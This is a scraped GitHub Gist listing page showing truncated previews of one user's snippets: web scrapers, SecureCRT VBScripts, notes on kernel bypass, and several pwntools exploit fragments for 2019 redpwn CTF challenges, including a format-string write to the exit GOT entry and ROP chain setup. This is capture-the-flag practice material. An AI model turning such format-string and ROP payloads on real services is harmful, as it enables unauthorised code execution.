LEE KUANTING swt02026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <assert.h> | |
| #include <memory.h> | |
| #include <klee/klee.h> | |
| signed int sub_804858B(signed int a1, int a2) | |
| { | |
| signed int result; // eax | |
| if ( a1 == a2 ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| touch nowKKTIX | |
| cp nowKKTIX previousKKTIX | |
| for i in `seq 1 1 50` ; do if ! curl -s https://kktix.com/events?page=$i | ~/go/bin/pup "li.clearfix h2 a[href] "; then break; fi; done | ~/go/bin/pup "a[href] json{}" | jq '.[] | "\(.href) ||| \(.text)"' | sort > nowKKTIX | |
| diff nowKKTIX previousKKTIX | egrep '^<' > diff.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.log_level='debug' | |
| elf = ELF('babyrop2') | |
| libc = ELF('./libc.so.6') | |
| pop_rdi = 0x0000000000400733 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| exit_got= 0x0804a020 | |
| r=remote('chall.2019.redpwn.net', 4003) | |
| r.sendline(p32(exit_got)+p32(exit_got+1)+'%47c%7$hhn'+'%336c%8$hhn') | |
| r.interactive() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| from pwn import * | |
| r=remote('chall2.2019.redpwn.net', 4004) | |
| #r=process('/home/ubuntu/environment/bronze_ropchain') | |
| #raw_input() | |
| # Padding goes here | |
| p = 'a'*(0x18 +4) | |
| #p += struct.pack('<I', 0x080a8e86) # pop eax ; ret |
swt02026
/ hardmode.py
Last active
August 19, 2019 09:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| r=remote('chall2.2019.redpwn.net',4002) | |
| gets=0x080483b0 | |
| system=0x0804b010 | |
| buf=0x0804a000 |
swt02026
/ kernelbypass
Created
July 3, 2020 14:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Kernel Bypass | |
| 作業系統層(user space觀察kernel space) | |
| 1. ebpf | |
| 2. dtrace | |
| 延伸應用 | |
| 1. tcpdump | |
| 2. seccomp | |
| 網路方面 | |
| 1. XDP(使用ebpf) | |
| 2. RDMA(Infiniband) |
swt02026
/ openfile_cyberark_securecrt.vbs
Created
July 17, 2020 01:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # $language = "VBScript" | |
| # $interface = "1.0" | |
| Sub Main() | |
| Set myShell = CreateObject("WScript.Shell") | |
| myShell.Run "notepad.exe" | |
| crt.Sleep 500 | |
| myShell.SendKeys "%F" | |
| crt.Sleep 500 | |
| myShell.SendKeys "^O" |
swt02026
/ upload_securecrt_session_log.vbs
Created
July 17, 2020 07:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # $language = "VBScript" | |
| # $interface = "1.0" | |
| Class FtpLoginInfo | |
| Public userName | |
| Public password | |
| Public serverIp | |
| Public Default Function Init(un, pw, ip) | |
| userName = un | |
| password = pw |
swt02026
/ accupass.js
Created
September 2, 2020 11:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const puppeteer = require('puppeteer'); | |
| for (const i of Array(50).keys()){ | |
| (async () => { | |
| const browser = await puppeteer.launch(); | |
| const page = await browser.newPage(); | |
| await page.goto(`https://old.accupass.com/search/r/1/0/0/0/4/${i}/00010101/99991231`, {waitUntil: 'networkidle2'}); | |
| //await page.pdf({path: 'hn.pdf', format: 'A4'}); | |
| const all_of = await page.$$eval("h3", (nodes)=>nodes.map(node=>node.innerHTML)); | |
| console.log(all_of) |